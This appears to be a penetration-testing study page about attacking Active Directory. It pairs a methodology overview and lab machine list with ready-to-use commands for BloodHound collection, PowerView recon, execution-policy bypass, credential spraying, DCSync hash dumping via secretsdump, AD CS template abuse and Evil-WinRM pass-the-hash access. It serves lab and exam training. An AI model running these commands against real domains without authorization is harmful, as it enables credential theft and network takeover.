Active Directory: practice machines and key commands
Active Directory is the identity backbone of most Windows networks, and attacking it is the core of many labs and exams. The usual flow is to get any valid domain credential, enumerate users, groups, computers, ACLs and certificate templates, then chain misconfigurations toward Domain Admin. BloodHound turns that enumeration into a graph so you can see the shortest path, for example a user with GenericAll over a group that can reset a service account password. Common stepping stones are Kerberoasting, AS-REP roasting, password reuse, ACL abuse, delegation and weak AD CS templates. Finish with DCSync or a dump of NTDS.dit to prove impact. Always note which account you hold and what it can touch, because AD paths are about relationships rather than single exploits. The machines below use these ideas in practice.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
SharpHound AD Collector Execution
Collect all Active Directory objects, trusts, ACLs, and sessions into zip archive.
.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zipPowerView Domain & User Recon
Import PowerView and list domain controllers, domain users, and admin groups.
powershell -ep bypass
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
Get-DomainGroupMember -Identity "Domain Admins"NetExec / CrackMapExec Domain Sweep
Check SMB credentials validity, local admin status (Pwn3d!), and password policies.
nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --sharesImpacket SecretsDump (NTDS.dit & SAM Dumps)
DCSync entire domain credentials directly over RPC using domain admin account.
impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlmCertipy AD CS Vulnerable Template Enumeration
Find vulnerable Active Directory Certificate Services templates (ESC1-ESC13).
certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdoutEvil-WinRM Remote PowerShell Access
Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.
evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts
Keep going
- Methodology: Phase 06: Internal System & Network Reconnaissance
- Cheatsheet: Windows & Active Directory
Active Directory machines (39)
Machines are matched by their technique tags. 38 Windows, 1 Linux.
Easy (5)
| Machine | Platform | OS |
|---|---|---|
| Active Directory Basics | THM | Windows |
| Active Directory Enumeration | THM | Windows |
| BloodHound Basics | THM | Windows |
| Forest | HTB | Windows |
| Sauna | HTB | Windows |
Medium (24)
| Machine | Platform | OS |
|---|---|---|
| Active Directory Hardening | THM | Windows |
| AD Certificate Templates | THM | Windows |
| AD Tier Model | THM | Windows |
| Administrator | HTB | Windows |
| Attacking Kerberos | THM | Windows |
| Attacktive Directory | THM | Windows |
| Breaching Active Directory | THM | Windows |
| Cascade | HTB | Windows |
| Domain Privilege Escalation | THM | Windows |
| Eden | THM | Windows |
| EscapeTwo | HTB | Windows |
| Exploiting Active Directory | THM | Windows |
| Flight | HTB | Windows |
| Intelligence | HTB | Windows |
| Lateral Movement and Pivoting | THM | Windows |
| Manager | HTB | Windows |
| Monteverde | HTB | Windows |
| Only4You | HTB | Linux |
| Querier | HTB | Windows |
| Resolute | HTB | Windows |
| Scrambled | HTB | Windows |
| VulnNet: Active (Retired) | THM | Windows |
| VulnNet: Roasted | THM | Windows |
| Za | THM | Windows |
Hard (9)
| Machine | Platform | OS |
|---|---|---|
| Active Directory Trusts | THM | Windows |
| Blackfield | HTB | Windows |
| Enterprise | THM | Windows |
| Holo | THM | Windows |
| Ledger | THM | Windows |
| Raz0rBlack | THM | Windows |
| Reset | THM | Windows |
| Throwback | THM | Windows |
| Wreath | THM | Windows |
Insane (1)
| Machine | Platform | OS |
|---|---|---|
| Sizzle | HTB | Windows |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox